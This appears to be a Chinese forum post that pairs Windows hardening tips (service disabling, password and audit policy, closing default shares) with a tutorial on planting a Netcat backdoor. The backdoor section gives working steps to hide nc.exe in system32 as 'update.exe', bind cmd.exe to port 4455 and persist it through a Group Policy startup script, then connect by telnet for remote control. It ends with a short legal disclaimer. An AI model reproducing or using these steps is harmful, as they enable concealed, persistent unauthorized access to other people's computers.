Windows优化策略及Netcat后门工具
一、安装步骤1、拔出网线
2、安装Windows及驱动程序
3、安装杀毒软件及防火墙
4、连接网线,升级病毒库及Windows补丁
5、安装常用工具及软件
6、优化
二、Windows优化
1、禁用不必要的服务
Application Management组策略部署软件
Certificate Propagation为智能卡提供证书
DFS Replication分布式文件系统
Diagnostic Policy Service诊断服务(系列)
Distributed Link Tracking Client NTFS文件系统连接
Fax 传真服务
Human Interface Device Access 智能手柄或笔记本快捷键
Microsoft iSCSI Initiator ServiceiSCSI设备服务
Net.Msmq侦听器适配器
Net.Pipe侦听器适配器
Offline Files脱机文件服务
PnP-X IP Bus Enumerator即插即用扩展(网络冰箱等)
2、采用一些第三方软件
推荐使用金山卫士,Windows优化大师等
360性能卓越,但是非常卡
3、组策略配置【能够实现的功能非常多是Windows,系统中最重要的安全管理工具,需要仔细研究】
密码策略
(1)gpedit.msc启动本地组策略
计算机配置-windows设置-安全策略-账户策略
(2) 密码策略
(3) 账户锁定策略
【附】密码原则:
复杂性 【最小8位】
易记忆性 【密码最好是一句对自己有意义的话】
时效性 【一般不要超过三个月,最长不要超过半年!】
如:
飞流直下三千尺 Flzxsqc:fl2x3_QC
【万一需要把密码保存下来要用gpg加密工具 【Linux下 pgp】】
审核策略
(1)计算机配置-windows设置-安全策略-本地策略
审核策略【比较重要的选项】
审核账户登录(本地账户登录)一旦登录系统,就会记录到时间查看器中
审核登录 (域账户登录)
审核策略更改
审核系统事件 (系统关机、重启或发生安全事件)
4、关闭默认共享
如果是默认共享的话,在局域网中,只要在另一台电脑上,开始菜单,键入
\\IP地址\盘符【如:c:】就可以直接访问到本地电脑上的文件内容
5、禁用guest账户
6、修改管理员用户名
三、Netcat后门工具
Netcat是windows中最常见的后门工具【首先需要拿到这台计算机的控制权限】
1、下载后把nc.exe拷贝的任意位置,找个不容易发现,普通用户不敢动的位置藏起来。如:c:\windows\system32中,并改个不容易发现的名字如update.exe
2、在被***端执行
3、C:\windwos\system32\update.exe –p4455–L –d-ecmd.exe
-p指定nc映射到4455端口 【netstat -a查看系统中所有已经开启的端口】
-L开启后持续允许访问
-d允许命令行关闭
-e映射到cmd程序
4、在被***端保证update.exe开机自启动,最好使用组策略
(1)将该命令写入一个脚本
(2)gpedit.msc启动本地组策略
计算机配置-windows设置-脚本启动-启动
导入脚本
5、***人员只要使用命令
telnet被***端ip地址4455
连接4455端口时,就可以获得被***服务器的权限
【Win7中telnet命令需要手工开启】
【Netcat工具包保存在我的资源文件中,感兴趣的读者敬请下载】
附:这篇笔记介绍的网络后门工具纯出于兴趣,希望读者千万不要拿别人的计算机进行尝试,否则是要承担一定法律后果的额,一定要遵守相关法律,希望大家理解,谢谢!
页:
[1]